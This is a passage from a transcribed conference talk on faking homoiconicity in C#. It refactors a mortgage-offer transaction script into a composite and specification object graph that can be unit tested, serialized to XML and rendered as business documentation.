graphs. So, that's basically the plan for the next 40, 55 minutes, I'm sorry. So, the overall problem that I'm trying to address here is this problem of how do we deal with complexity in software? So, how do we know that the software that we're building actually works? How do we know that it works as intended? How do we report to the business owners, the people who pay our wages, that we actually implemented what they think they asked us to implement? And how do we make it easy to continually get new requirements and implement those and report back to the business owner? So, you're probably sitting there now and thinking, oh, he's going to talk about behavior-driven design. We kind of heard this before. And I'm not going to talk about behavior-driven design at all, apart from right now. And it's not that I have anything against behavior-driven design at all. I don't. But it's just not my agenda for today. My agenda for today is to talk about how can we actually design code and reason about code in a way that also addresses some of those problems. So, if you like behavior-driven design, there's no conflict in what I'm going to tell you today and behavior-driven design. So, you can do both if you want to. So, but it's not a behavior-driven design talk at all, just to make that clear. All right. So, let's start talking a little bit about homo-iconicity. So, what is this thing actually? So, it turns out that certain languages have this property of homo-iconicity. So, it's something that's built into the language. And basically what it means is that code is expressed in the same way that you would express any other sort of data structure in that language. So, you could say that the code you write is just a special case of any other sort of data in that programming language, which means that if you know how to manipulate data in that programming language, you also know how to manipulate code, which makes meter programming very easy. So, if you ever dabble with reflection in C-sharp or similar languages, you will know that it's, well, it's not impossible to write reflection code, but it's just orders of magnitude more difficult than just writing your normal C-sharp code or Java or whatever you're working with. So, homo-iconicity is a property that some programming languages simply have. And it's not like most programming languages have this property. Actually, it's not that many. The most famous language family is Lisp and all its variations. And there's a modern variation of Lisp, a modern dialect of Lisp called closure. And I'm just going to show you five minutes a demo of closure and what homo-iconicity looks like in closure. So, if you've never seen closure before, don't despair. I'm just going to do hello world. And for the rest of the presentation here, I'm not going to spend any more time actually doing any sort of closure code. So, I'll stick with C-sharp for the rest of the day. So, I'll do hello world. And the first thing I want to do is define a function. So, I can define a function called hello. Maybe this, let's just start over again. This IDE is a little bit, I think it's an alpha IDE. So, let's see where it gets me. But basically, I can say define a function called hello that takes an argument we call subject and concatenate the string hello with the subject. So, that's basically my function here. So, I can try to invoke that function. And as you can tell right now, it's throwing an exception saying that I passed the wrong number of arguments to that function because I passed zero arguments to that function and it actually expects one argument into the function. That's the subject thing that sits there. So, I can do that. So, I can say hello and DC and everything works fine and you can actually tell that if I change this, it actually updates on the fly. So, it actually works, which is nice. But the thing that happened when I just started typing hello with those parenthesis around is that when you have parenthesis around something in a list, that means you are creating a list of things. And by almost by convention, but this is actually one of the very few rules in the language is that by default, the reader, the compiler that is what we call that the reader, slightly different, the reader will try to interpret the first element in a list as though it was a function and will try to evaluate that function using all the other elements as input into that function. So, that's why it's complaining right now because I have parenthesis around that. So, we can define it, you know, all sorts of different things as lists. So, I could write the list one, two, three, but then I would get another exception saying you can't, one is not a function, so you can't evaluate that. So, we need a way to stop evaluation from happening and we can do that by setting this little back take in front of it. So, that's called a syntax quote. So, we can actually do that with the code that I have up here as well. So, I can just syntax quote that. Now, it's no longer a function that's being created. Now, this is just data. This is a little bit hard to see, but I can define a new symbol and I can call that hello data and just close this definition off. And now, you would actually see that, oh, that's a little bit difficult to see. There we go. That this is actually now just the data itself and I need to do one thing also because everything is namespace qualified and I need to unqualify this subject here because it's just a local, a local symbol. So, I can still evaluate this code. I just need to force evaluation now. So, I can say eval, hello, data. That just returns a function and then I can try to evaluate or to actually call that function by putting parenthesis around that one and then it gives me the same exception as before, but I can then go and pass in the argument and you see everything works okay. All right. So, we can still treat code as data, but we actually query the data as well. So, I could pull out elements of this list. So, I could define a new symbol. I can call that decode for the declaration and I could say, let me take the first two elements from Hilo data. So, any of you who are familiar with link would probably know the extension method called take and you can pass take two and that's exactly what I'm doing here at the moment. I'm just taking the two first elements out of my Hilo data and that's the defun macro and the Hilo symbol. And I can also take the rest of it out so I can define body as not as take. In C sharp in link we would call skip two. In closure it's just called drop two, but the idea is exactly the same. So, I can simply just drop the two first element and then get the rest in that list and I have two other elements here. I have the subject which is kind of looks funny now because it's being unquoted, but never mind that. And then I have another list which is the second element. So, notice that we have lists within lists and we can have lists within lists within lists within lists and nest our programs in this way. So, this is almost like a tree or a graph. If you will, this is actually a tree because it lists can be nested in that way. So, keep that in mind when I'm, I'll talk about how we kind of learn from this when we do C sharp code because I will be talking about graphs and trees and things like, funny things like that. All right. So, I would like to define a better version of this HeLow function because I would like to define a version that takes zero arguments or I would like to add an overload that takes zero arguments while retaining the stuff that I already have. So, I'd like to modify what I have at the moment and actually create a better HeLow function out of this. So, I could take and just put those things together again, but I'd actually try, I would actually like to update this and do something, make it better. So, I'd like to create a function overload for this that takes zero arguments. So, I can't modify the existing list because closure is a functional language. So, it doesn't allow me to mutate a list, but I can create a new list out of the existing lists that I have here. So, let me first define another symbol I can call that default body that, that just contains the body of the overload that doesn't really take any parameters. So, I'm going to quote this and I'm going to say the empty arguments array, which is just looks like, looks like that, which would map to a default string which is hello world. So, you can see I just have the empty argument that maps to hello world. All right. So, now let's put these things together. So, I'll define a better HeLow and I'll just define the data for the better HeLow function and then I can evaluate that afterwards. So, I want to concatenate those lists together. So, I can say concat, concat if I could spell and I could start with decal which just gives me at the moment just the decal symbol because that's all there is in it. And then I want to take the default body and add that and that I need to add it as a list, but I need to expand the symbol here. So, without getting into closure details, I'll need to do this and then do default body. So, for those of you who are interested, I think there are more closure talks tomorrow or on Friday. So, maybe otherwise come and ask me afterwards why I'm doing the back ticks and the till this and so on. But this pretty much just expands into concatenating those three things together and I can now go and let's see if I can go and eval that better HeLow data. Let's see. There we have it. So, that's a function and now if I try to evaluate or actually execute this function and I'll get HeLow world, before you remember I just got this exception saying you can't pass in zero arguments, but now I actually can because I just added this overload to the function and I can still pass in DC and actually get the original behavior back still. So, you'll notice that what I did here, I treat code as data and then all of those take and drop and concat methods and so on, they are not designed particularly to manipulate code. I could use those functions to manipulate any sort of data at all. They're just designed for general purpose data manipulation, but it just turns out that I can also use them to manipulate code. And actually, when you look at closure code, this is what builds up the basis for a very, very rich macro system that closure has. And I'm pretty sure that anyone who's actually writing real life closure will now come and tell me that this is not at all idiomatic closure code, but I think it gets the point across, I hope it gets the point across that you can actually manipulate code as though it was data and that's actually what I'm trying to tell you here. So, enough of the closure code, although it's very exciting, let's talk about some object-oriented code. Let's talk about C sharp code. So, what about C sharp? C sharp is not homo-iconic. Homo-iconic is something that's built into the language and it's just not built into C sharp and I can't see how that would ever happen because the syntax of C sharp is not something that even remotely resembles data structures in C sharp. And we shouldn't feel bad about this because, you know, Java is not homo-iconic and, you know, lots of popular languages are not homo-iconic. But still, we can learn from this. We could get inspired for this. So, it turns out that if you have a certain type of problem, you can actually fake homo-iconicity. And what I'm talking about here is not, I'm not talking about trying to somehow treat your low-level C sharp code as though it was data. So, I'm not talking about building up a DOM here and trying to query the DOM. What I'm talking about here is that you can build a specialized domain-specific language for certain type of problems and then you can actually build into that DSL. You can actually build in something that very closely looks like your programming constructs that you used to work with, like an if statement and loop and so on. So, it's very well suited to decompose procedural code, for example. And that's what I'm going to talk about today. So, it's not a general purpose approach, but it's just an approach that have proven valuable to me so many times that I thought that this is a good time to actually share with other people. Right, okay. So, first, let's look at a demo. I'll just walk you through some code that gives us a motivating example. So, I'll switch to Visual Studio now. And I don't know if you can read this, but I'll just walk you through this. So, the scenario is based on, it's actually based on a real life code that I saw a couple of years back. So, I worked for, I worked as a consultant for a company that lived off, that company that did mortgage loans. So, you want to buy a new house, you want to take out a loan in that house in order to be able to buy it. So, that's something you can do in Denmark. You can actually take out a loan in something you don't own with the guarantee that you will own it. So, kind of funny thing. Anyway, so, this company collected a lot of data from potential customers. So, when a customer contacts this company and says, I'd like to take out a loan in this house that I'm thinking about buying, they say, well, that sounds very interesting. Let's just hear, you know, your entire life story because we want to know who you are and whether we actually want to extend that loan to you. So, they collect a lot of data. So, I just try to simplify this a little bit. So, in the end, in the center here, I have this thing called a mortgage application. So, an application here is not a software application. It's because you're applying for a loan. So, that act of applying is an application. So, that's the mortgage application. It contains some data about the applicants. There might be a primary and a secondary applicant and so on. Each applicant has contact data. Contact data has addresses on. The mortgage application also has information about the properties that you're looking to buy. Maybe you also have information about the property you already own because the applicant might want to, you know, sell their current home to move to a new home. And those properties have addresses as well. And then there are some enumerations and other stuff going on. So, imagine that this is just my paraphrase over that company's code. Imagine that this was just a lot more complex than what we are looking at at the moment, you know, many more classes. And these are just very dumb DTO-like classes. So, there's no behavior in this. This is pure data structure. So, what they want to do with that sort of thing is to produce, you know, to somehow treat or manipulate that data. So, they want to process that data. So, they have this mortgage application processor here that has this one entry point method called produce offer. It simply takes one of those mortgage application instances and then it produces something called eye renderings. And the reason why they wanted to do that is because when they've collected all this information from the customer, the potential customer, they want to extend an offer letter with details about the loan offer that they're actually extending towards that customer. And that may actually be a lengthy process because it might involve a human that needs to sign off on it or it may involve some sort of batch job that's running on a mainframe but only running at night. So, you can't just, you can't just do it online necessarily. You have to actually submit this to something and wait for the results to get back. So, this is kind of a big process. So, if anyone is familiar with the term transaction script which is something Martin Fowler describes in the patterns of enterprise application architecture, what we have here is a transaction script. And I'll just walk you through it in a moment. I'll also show you the output. So, the reason why they're outputting eye enumable of eye rendering, eye rendering is just a custom interface that I just made up here but pretty closely resembles what they were actually doing. The reason why they did that was they wanted to produce that offer letter in some sort of, I think they actually produced it in PDF. So, they were talking to a third party component. So, they needed to have all those renderings. So, like they had, you know, a plain text rendering, a boat rendering, a headline rendering and so on. So, they could kind of use that polymorphic type and then that could actually render into PDF. And that's actually a pretty good design decision because you could always change your mind and render into something else at a later date. So, that makes sense. But don't think that I'm trying to teach you how you should do text renderings because there's all sorts of other, you know, template-based methods that you could do to actually, you know, render a letter. So, I'm just using this as the best example that I've seen so far of this technique. So, I'm just having this transaction script here. So, I'm just slowly going to scroll through this so you can actually see how much code there is. And I've just made this up to look like what they had. And you would notice that there are, for example, code comments sitting in between here. So, we can actually have an idea about, you know, this section probably belongs together because it sits between two code comments and so on. And I can just scroll down here to the end and you can see that I have maybe, I have 263 lines of code. So, imagine that this is just an example. They had thousands of lines of code that all looked like this. And if I scroll up again, you will see that I have, for example, a switch statement here that has three cases on it. This becomes interesting in a moment. I have an if statement here. And I have another if statement sitting a little further up. So, here's another if statement. So, two if statements and a switch case. A switch statement. So, that's pretty much it. The only thing that I want to point out as well, well, let's just run this so you can get an idea about what it looks like. So, it just looks like a letter more or less. So, I'm not rendering to PDF because I don't know how to do that. So, I just decided to render to mark down instead. So, on the left-hand side here, you have the mark down that I render. And then on the right-hand side, you have the actual, how that mark down might actually render. So, you will see here's just an awful letter saying something Oslo, 12th of June, 2013, blah, blah, blah, blah, blah. And then there's a lot of details about stuff. And then there's the loan offer with the fixed rate offer. All right. So, that first line of code, that first line in the letter here, Oslo, 12th of June, 2013, actually turns out to be interesting because how is that actually produced? That is produced by, you know, the first thing this thing does is it just, you know, creates a list of I renderings and then it says renderings.add a text rendering. And the text in that text rendering is then the result of calling something called a location provider, which is a dependency, which is an interface, and you call into something, get a current location name. And you concatenate that with, you know, the time provider as well. And then you just move on after that and never really use those dependencies again. All right. So, that's just the motivating example. I'm not saying this is how you should write code, but that's actually how they did write code. And the funny thing is when I consult people and talk to people about how to do test-driven development, they pull out code like this and then they ask me, so how would you arrive at code like this if you did test-driven development? And I kind of go, if I did test-driven development, I would not arrive at code like this. And I don't necessarily mean that as a criticism. It's just very, very, very difficult. I would almost say almost impossible to arrive at code like this with test-driven development. And I'll explain to you in just a while why this sort of code is so darn difficult to unit test. So, we started talking about how could we actually make this more testable because that was one of the problems that they had that they didn't really know how to test this code. The other problem, it turned out when we started talking about it, is that they, it turned out they actually had to document to their business owners what that transaction script actually did because it actually contained a lot of very, very important business logic. So, these sorts of things change on a regular basis because, you know, you want to do all sorts of different risk analysis on the people who apply for a loan and you want to change what goes into the letter depending on the risk profile of the applicant and so on. So, lots of different things actually happening there and that changes on a regular basis. So, the business needed to know what was actually happening in that software because they wanted to know that they actually did the right thing. So, they had to somehow find a way to report that to the business owners. And it was actually even worse because it turned out that they also needed to be able to take in requirement from business owners. And the way that did that was, I think it was an Excel spreadsheet. So, they had a spreadsheet that said, you know, print this, print this, print this. If this is true, then print this, else print this. So, they almost had like, you know, sudo code there but something that the business owner could understand. Why could the business owners understand it? Well, because it was in Excel, obviously. But anyway, so, but they spent a lot of time actually going back and forth on this because that was actually why the code looked like it did. That was actually why they had this transaction script because that was the only way they could actually figure out a way to mentally cope with this whole idea about they having thousands of lines of code and still somehow translating that back and forth to that Excel spreadsheet and they could actually deal with that. And, you know, if they had refactored this out into lots of helper methods and so on, that would just have been mentally impossible for them to do. It was hard enough to do already. So, I'm not actually criticizing these people. They had actually a very, very nice looking code base. I think it was pretty easy to understand what that transaction script actually did. They were very disciplined with how they worked with that but there was just still a hard problem for them to solve all those things. So, the reason why this is difficult to test is something that's kind of interesting. So, first of all, I talk about I have two if statements and a switch case statement in this thing here. And you can imagine that what they actually had was, you know, dozens of different if statements and nested if statements, so if statements within if statements and so on. And it turns out that if you want to cover all pathways through code base like this, well, the first if statement you encounter, you have two different pathways that you can go through that system. And then you encounter another totally independent if statement. Now, you have two more but that's two by two. So, that's four. And then you have that case statement that, you know, effectively has three different pathways. So, you multiply that as well. So, you say, well, that's 12 pathways through the system. That means I need to write a maximum of 12 test cases. That doesn't sound so hard. And I agree because this is sample code. That does not sound so hard. But I don't know if you can imagine if you start just adding a few more if statements. So, I think the sixth or the seventh if statement you add to this, you actually already cross the barrier into the hundreds of test cases. So, this is a combinatorial explosion of the pathways through the system that you need to do. So, it's not unrealistic if you have a transaction script like this that you would actually need hundreds if not even thousands of test cases to be sure that you actually cover the entire system. And then you go, well, let's just pick, you know, representative test cases and test those. But how do you know which ones are actually relevant? So, it's already at that point it's actually pretty hard to figure out how do we test a system like this. So, the next thing is you notice this time provider and location provider that I had. And it sits in the very first real line of code there that it calls into a time provider and a date, an allocation provider to actually get some data out of that. And the way that we normally, when we unit test, the way we normally deal with dependencies is that we replace the dependencies with test-doubles. And the way we normally do that is by using some sort of mock library, dynamic mock library like mock or RhinoMock in substitute, whatever. And as you probably know if you've ever done this, you need to configure a mock to actually tell it, well, when you are called you should return this particular thing back. And if you don't do that, it's probably going to throw an exception because it got a call from the actual code but it didn't know how to respond to that call and then it just gives up and say, well, I don't know how to deal with this, I'm going to give up. So, effectively this first line of code that I showed you acts as a guard clause. You can't really get past that unless you configure your mocks. So, again, imagine that in a real system you don't have just three dependencies, maybe you have ten dependencies or even twenty dependencies and they all act like this. So, for each test case you have to configure, let's just say, ten different mock objects. So, you can multiply that by the thousands of test cases you already have and you have tens of thousands of mock configuration statements that you need to maintain. And then someone comes by and says, you know what? I think we should change the way this dependency interacts with our system and you just go, no, absolutely not because you know you have to change ten thousand lines of code, of test code that will break if you do that. And that leads people to say, you know, mocks are evil. And actually if you go by a book called Growing Object Oriented Software by test, a guided by test, one of its messages is that, you know, you should listen to your test and what the tests are trying to tell you in this hypothetical situation is that you have to decompose the code. Let's get back to that in a moment. So, the third problem with code like this is that the input is itself very, very complex and you need to populate this entire input class in order to actually get all the way through because various parts of that transaction script will depend on parts of those data elements actually being available. So you also also have a lot of maintenance nightmares sitting there and waiting for you. So lots of problems with this sort of code. So we really, really need some way to decompose code like this. It would be really, really nice if we could somehow treat the code as data. So let's think back to this idea about homo-iconicity. It could be somehow model this code as though it was data. And it turns out we can actually do that is if we introduce some sort of domain specific language or try to extract some sort of domain specific language out of this thing and build a graph, an object graph out of those things. So the idea is here that each node in that object graph will represent one part of that procedural program. So basically everything that sits between two of those code comments, we could think about that as a part of a block or a node in that particular program. And we can actually take this a little bit further because if we define a common interface out of this, I'll show you that in a minute. If we do that, we can actually not only just pull out the different blocks and treat them as statements in that higher level language, but we can actually also emulate familiar constructs, coding constructs like if and switch and so on. So the building blocks for doing that is to extract all that domain specific code, all of those building blocks out of the transaction script, and then just use a few common well-known patterns, one called composite and one called specification, to create those well-known building blocks like an if statement or a switch statement and a list of statements and whatever you'd like. So imagine that we're looking at that first line of code that I've been talking about all the time, so this thing that does this Oslo, the 12th of June, blah, blah, blah, this is that code. So it sits between two comment codes. So we think that's probably a block that we want to somehow refactor. So the first thing we could think about doing is to just take this and extract this into a private helper method. So your IDE can do that automatically for you, particularly if you use resharper, then this happens very, very easily. So now you have this helper method that does exactly the same thing as before. So that doesn't really get us very far, but that's just the first step in the refactoring. So you'll notice that this helper method takes as input a list of I renderings and then it just renderings.add just like before and then it returns void. So it does exactly the same thing as before, but I'd really like to see if I could somehow morph the signature of this helper method into a signature that looks like the containing method. So the containing method is called produce offer, takes in a mortgage application and returns I enumable of I rendering. So the first thing I want to do is instead of taking in a list of I rendering that I can add to, I just want to return an I enumable of I rendering instead. So instead of doing renderings.add, I'll just do yield return instead and you will also notice that I changed the signature of the method itself. Now it doesn't take any input, but it returns I enumable of I rendering instead. So I'm not quite there yet, but I'm moving towards the direction where this method looks like the other method. So at the calling point, it originally looked like this when I refactor or when I extracted the code, I just pass in renderings to that method and after I do the refactoring of the signature, it just looks like this instead. So I have renderings.add range and I just add that range of I enumable that's coming in. So it still works at the call point, if you will. You have a question? No? No one? All right? Okay. So the next thing we can do is then we want to morph the signature of this helper method into something that looks like the signature of the containing method. So the containing method takes a mortgage application instance as input. So we can add this to this helper method as well. Even though we don't need it, I just added it because now it looks even more like the containing method. All right? Okay. So I can make it public instead of having it private. And this is where, you know, people who are not used to TDD go like, why are you, you made something, you made it public just for testability purposes? And I'm kind of like, yeah, I did, but what's the harm in that? I mean, there is no, there's no break, breaking of encapsulation here because what could happen if someone from the outside calls into this method? It doesn't change any internal state at all. It just produces those eye rendering. So we could call this as many times as we want and not break anything. So it doesn't really break any, it doesn't really break encapsulation. So I think that's, that's a perfectly fair thing to do because already at this point, we could actually start unit testing this helper method and just figure out whether that helper method actually does what it needs, what it needs to do in isolation. So that would actually be pretty nice if we just do this for all the blocks in our transaction script and just say, well, now we can unit test all of those helper methods in isolation, but we have one problem left. And that is, we know that all of those helper methods work in isolation, but we actually don't know if the overall script actually calls those methods or whether it calls them in the correct order or whatever else happens. So we need to go a little bit step further and we're not really at the point yet where this is starting to look like data. This is just a helper method and a helper method is not really something that is, that in an object oriented language, we can treat as data. But if we extract this into a class, then we can start treating it as data because what is object orientation all about? Well, classes are, you know, data and behavior. So that is basically what we have here. I have some behavior, that is to produce date and location renderings method, and I have some data, which is the location provider and the time provider that I pulled into this class as well. So now I have something that is beginning to look a little bit like data. It also has behavior, but now it also has data because it has these two providers that it's carrying along. So at the moment, I have two methods that are public in two different classes that take mortgage application as input and produces I-enumable of I rendering as output. They just have two different names. So let's have a look at the name and change this name to produce offer. So now I have two methods that have the same name and the same signature. So that is beginning very, very much to look like they implement a common interface. So we can now extract an interface out of this and say, well, this data location mortgage application processor, very enterprise name, I know, implements this I mortgage application processor interface that I just extracted from that produce offer method. And I can do this with all the different parts of that transaction script and have them implement this I mortgage application processor. So seen from the outside, they look like the same. They have the same interface. And they contain data as well as behavior. So just as a side note, stuff like this is really, really easy to test. So I don't know if you can read the unit test in the back, but the important part isn't actually how you would unit test this. If you're very, very interested in that, this code is actually also I uploaded it to GitHub a couple of hours ago. So you can actually go and look at that. But the point here is to test the main behavior of this class, you need one, two, three, four, five, six coding statements. And that's pretty much what you need to test that part of your system. You probably need a few auxiliary unit tests as well to see that it has the rig that it implements the great interface and so on. But that's basically it. So it becomes very, very easy to test each of those things in isolation. And now you have a lot of those things where you know that each concrete implementation of I mortgage application does what it's supposed to do. And you also know that they have the same shape. Now you can combine them into something called a composite. So composite is a design pattern that is described in the original gang of four design patterns from 1994. So this is the design pattern we've known about for almost 20 years. It's one of the most powerful object oriented composition patterns available at all. I use it all the time. I can't get my hands down because I just love the composite pattern so much. It's really, really powerful. So what we have here is a composite mortgage application processor and it implements I mortgage application processor. So it's the same interface as those specialized leaf nodes, if you will. But it also composes an array of other I mortgage application processors and those could even be different concrete classes because they just have to implement the same interface. So that's what we're talking about when we talk about polymorphic graphs. And the way that it implements the produce offer method is simply just by saying, well, for each of the nodes, for each of the I mortgage application processors that I compose, it will call produce offer on that node and then it will concatenate all of the renderings together. So if you're not familiar with this built in links and tags, this is just a select many statement if that's better for you. So it just concatenates all the renderings into a stream of renderings and then returns all of those. So the caller doesn't really notice the difference. The caller just sees that this is a single I mortgage application processor. But behind the scenes, it has behavior because it composes the behavior of all the other things. But the interesting thing here is it also has data because that node, I just made it a field but I could have made a properties. Well, that node's fields is public. So you could actually just walk up to this composite and have it list all the nodes that it contains and then you would know that because you know the behavior of this is correct, you know that, you know, the order that the nodes actually appear in is also the order that they will be invoked in. So you know that if you just know the, which concrete nodes are composed into this composite, you also know how it's going to behave. Right. So, and also an interesting thing about composite is you can actually compose a composite into a composite because a composite itself implements I mortgage application processors. You can have nested composites here if you think that's interesting. That is often very interesting to do. You just need some leaf nodes at the end and that's all those specialized nodes that I talked about before that you extracted out of that transaction script. All right. So the composite solves the problem of how do we actually know that all the statements appear in the correct order but what if we also need to know that some nodes should only be invoked if certain conditions are true and to answer that question we have to pull in another design pattern which is a little bit newer. It's described various places but I first read about it in this book called Domain Driven Design by Eric Evans. It's called the specification pattern and pretty much it's just a very verbose way of saying here's an if statement or here's a predicate. So this is just your object oriented way of having a predicate. So basically it just encapsulates a rule about in this case mortgage application, mortgage application. So you can pass in a mortgage application into a concrete specification and then if the specification is satisfied it will return true and otherwise it will return false. So with that we can create a conditional mortgage application processor and this is where we start simulating an if statement in our domain specific language. So that thing also implements our mortgage application processor just like before and it decorates another mortgage application processor that we call the truth processor but it also composes a mortgage application specification into it and the way that we implement the produce offer method is then by saying well if the specification is satisfied by the application then I'm going to invoke produce offer on the truth processor and return that result back to the caller and otherwise I'm just going to return an empty enumable of our rendering. And I could even expand this to also add a false processor so instead of just returning enumable empty I could return and call into the false processor and return result of that if I wanted to do that and that would be an if else construct. And the interesting thing here again is that this has behavior but it also has data because the specification and the truth processor is our public fields or it could be properties that you could walk up to and actually inspect and figure out do they actually, do they have the right concrete class types that I expect them to have and if you know that you know how the overall composed systems is going to look like so you can inspect those things, you can inspect the structure of a conditional like this. So this is also something that is very, very easy to unit test so this is testing and I'm not supposing you can actually read this from the back but it's one, two, three, four, five, six, seven lines of code or seven statements and this actually proves that for any implementation of those interfaces the behavior will be correct so this actually proves that this particular component adheres to the disk of substitution principle which means that we can walk up to this general purpose thing and inspect its structure and know that it will always do the right thing. So we can now, when we have all those building blocks we can actually compose the graph structure that will replace the original transaction script and the way that we can do that is first I'm just going to unload this and I'm just going to fast forward because what I've shown you so far is just the procedural version of this code base and I'm just fast forward into a version of that code base where I actually have added all of those nodes but I didn't change the original mortgage application processor class here because I just wanted to do a side by side implementation of the new thing so that we could actually compare the new and the old thing. So this is still the old thing I just kept that so that we could compare them to each other. So the new thing would look like I have something, I have a class that actually composes that entire object graph and let's just collapse that for a moment. So the composer has this single responsibility that it just composes a mortgage application processor that the caller can then go and call produce offer on. So the way that I actually construct this is that I start out by creating one of those composites. So here's my composite mortgage application processor and I just start assigning an array of polymorphic types, all of things implementing a mortgage application processor to it. So the first thing I assign is that date and location mortgage application processor that I just showed you which basically just addresses these two lines of code. It does the exact same thing but now we actually have a structure where we can walk up to this array afterwards and have a look and say, is the date and location mortgage application processor the first element in this array? Yes it is, now we know it actually does the right thing and we can move on and do that with all the other things. And as you can tell, I have that first if statement occurring down here where I say, well, if there are any additional applicants, then I'm going to print out the information about each of the additional applicants for this application and you can see that happening down here. So I have this conditional mortgage application processor that I told you about which simulates an if statement in this higher level language, this domain specific language that we're kind of evolving here and I'm saying the specification is something called an any additional application specification. We can just move to that one and you can see it encapsulates the same test as before so additional applicants.any. So it seems like a very enterprise way of doing that but there are some very interesting things that we can derive, very interesting benefits that we can derive from doing this. And then we assign the truth processor here and say, well, that is then a processor that will actually print or render all of those additional applicants. And the interesting thing about this is I am not really invoking any code here, I'm just building up a data structure and a data structure that just so happens that it also encapsulates some behavior but basically I'm just building up a data structure and I could actually write a unit test that tests that this is the first node in that nodes list and this is the second node and this is the second node and this is the, you know, and everything happens in the correct order so that would be possible and I actually do have a test in here that does that but it looks exactly like this so it's not very interesting to look like. So I can run this code now and we can start by switching back to that those offer letters and see that they don't really look like they've changed much at all which we wouldn't really expect either but now we have full test coverage of this so I can actually try to see if I can run the tests here and I actually ended up writing 137 unit tests which is still, that may actually seem like a lot but I did some other things as well but I actually have full coverage of this system now. Alright so that actually takes care of the unit testing aspect of the, of the, of this problem so what I, what we are doing here from a unit testing perspective is something called structural inspection. Instruction inspection basically goes like this so if you can prove with a couple of unit tests that your general purpose components always work in the intended way so that would be your composite and your conditional and so on. If you can prove that they adhere to the disk of substitution principle by just passing in some mock instances or whatever they, that it is that they compose, you know that they always work in the same way so that means that now when you encounter one of those things you know it always does the right things so you just need to, to inspect its structure to know that it's, that it's actually composing the right things. And then you can unit test all of your specialized building blocks as well and know that they do all of those interesting things and then you can also maybe test the composition, the overall composition or somehow define what that overall composition looks like and then you know when you do that that the entire system will work as intended. So that seems or sounds very enterprisey but the very, very interesting thing of doing this is that each of those small components that you unit test, it only requires a couple of unit tests to test each of them individually. So instead of having that combinatorial explosion of test cases that you would have to do to cover this entire system, you just have an additive system where you say well if I need to add a new if statement I just need to add one new test case and then maybe a test case that test the structure still is as you expected it to do. So it's much more linear in the way that you can actually deal with complex systems. So it may seem like a little bit of an overkill here for my simple sample code here but this is really something that allows you to scale into something that's much more complex. So that takes care of the unit testing part of that problem that my original customer had but it turns out that we can actually do some interesting things now because that graph is also a representation of data. So what I actually have that command line utility do in addition to just running the graph is I actually had it dump an XML file. So I just used the data contract serializer to serialize this entire graph to XML and it's not pretty at all but it's all there. All the information needed to reproduce this object graph is there. All the data about the structure of this graph with the conditioners and what the location providers is and everything, it's there for everyone to see. And obviously you can't ship things like this to your business owner but what you can do is you can take maybe a, you know, produce a little style sheet out of that. So let's just load that in and say, well, let's start matching on that composite thing and then we can have matches on all the concrete leaf nodes like the data location markets, the application process and so on. And also you can match on all the concrete specifications and the conditioners and so on. And we can use that to print out another markdown file. So let me just pull that one in. So now we get a markdown file that looks like this and it's, I'm just waiting for it to render. Oh, here we go. So the markdown file pretty much just says, well, do all of this because the first thing is a composite and just says, well, do all of this. Maybe it should say in order in sequence. So it says print data location, print greeting, print application details headline, blah, blah, blah. It even handles the if statement. So it says, well, if there are additional applicants then print details about the additional applicants. So you can pretty much just take this and ship to your business owner and say, well, this is what our code does at the moment. You know, instead of using a lot of mental energy and time of doing this, this is just something that happens in less than a second. You can actually just do that and just say, well, well, here you are. Here's your documentation. So sometimes when people talk about, well, when I talk about code as documentation, I mean something like this. It's kind of interesting that you can do that. So you can take that graph and you can serialize it and you can transform it and then you can distribute whatever you transform. So you can transform it into markdown as I did or transform it into PDF or maybe HTML even, but you don't have to serialize it. You could actually just render it on the fly. The reason why the data contracts serialize it can do this thing is because it can walk the graph. So you could write your own code that just walks the graph in memory and instead of producing XML or some sort of thing that sits on a file system, you could just walk the graph and then, you know, just dynamically spit out HTML. So if you have a web-based system, you could pretty much just create a dynamic web page that you could say to your business owner, well, you know what, just go and visit this web page and it will always tell you the business rules that are running on the system at that particular moment. And you can make it as explicit and detailed and, you know, nice to look at as possible. I was just a little bit lazy so that's why you just got that tree-like structure there. All right, but wait, there is more. Because one thing is that you can render and interpret this graph, but you don't have to just passively look at this graph. You could actually, now you have a graph. Well, you could change it. So let's try to do that. So imagine that some of our business owners come by and they say, well, you know what, we just made a deal with a real estate company so that if we can refer customers to this real estate broker, we get a referral fee. So it would actually be pretty nice because we know a lot of our customers are looking to sell their current property to finance the new property that they're going to buy. So when we know that, it would be very, very nice to actually print in their offer letter some information about that they should choose this particular real estate broker over other real estate brokers. But if they're not looking towards selling their current property, there's no reason to bother them with that because that would just seem unprofessional. So what we can do, and I'm not saying that you should do all your programming in XML because that's actually pretty horrible, but you can actually just take and mutate or modify this graph here. So what I have here, I just added a little note saying, here's another conditional mortgage application processor. That's our if statement, if you will. And the specification is even one that we have before. This current property sold as financing specification as it's called. That was the same specification that I used up here to print out some other things. So that's actually a component, you know, reusable building block that I already have. So I had two reusable building blocks here already in place. So the only thing I actually need to do is just to create a new component, I call it realty-opsell mortgage application processor. So that was actually the only new leaf note I needed to create in order to match that new business requirement here. And I could write a couple of tests. I think I wrote three or four unit tests for that thing, and then that was actually done. And I just added that. And now everything is actually good. So I'll save this, and I'll run this command line application again because what it does actually is if it finds this graph, so the XML file at the place where it's running, it's going to deserialize that graph and actually use that instead of the hard coded graph that I showed you at the beginning. So we should expect that if we go back to first the report, it gets a new if statement here at the bottom, and it actually does. So it says, if applicant will sell current property to finance new property, then print an offer of additional real estate services. So let's check out and see whether that actually works. So here's an application where the applicant actually wants to sell the current property. So it says, current property will be sold to finance new property. We had that before. So we would expect if I scroll down that this offer about real estate brokerage services actually sits there, and so it does. So it says, do you need help selling your current property? Then blah, blah, blah, blah, blah, blah. And another scenario here is one where we don't have anything about selling the current property to finance the new property. So we wouldn't expect that real estate broker offer to sit in the bottom of this offer page, offer letter, and it doesn't. So this actually turns out to work pretty well. All right. So I just manipulated this graph on XML. I just manipulated the persisted graph because I think that was probably the easiest thing I could do in the time frame that I actually had because if I needed to build a complete UI system and so on, you wouldn't really be able to understand or it would be very difficult for me to get across what it was that I was actually doing. So I'm not saying that you should begin to program an XML again. That was a fact that, you know, ended more than 10 years ago. So I'm not saying we should go back to that. But it is possible, and it's just to illustrate how easy it actually is to manipulate a graph once you have a graph because it's just data. It's also behavior, but the behavior is contained in the type and you have information about the type. But what you can actually also do is you can just manipulate that graph in memory on the fly if you need to do that. So imagine if you had that report page where the business owner could go and have a look at what do our current business logic actually look like. Imagine if you had a web page out of that. Imagine now that you actually put buttons besides each of those nodes where you can say, well, reorder, delete, or move, add new things. And you can actually turn this into some sort of rules-based engine. I'm not saying that's always interesting, but it's just interesting to know that that is 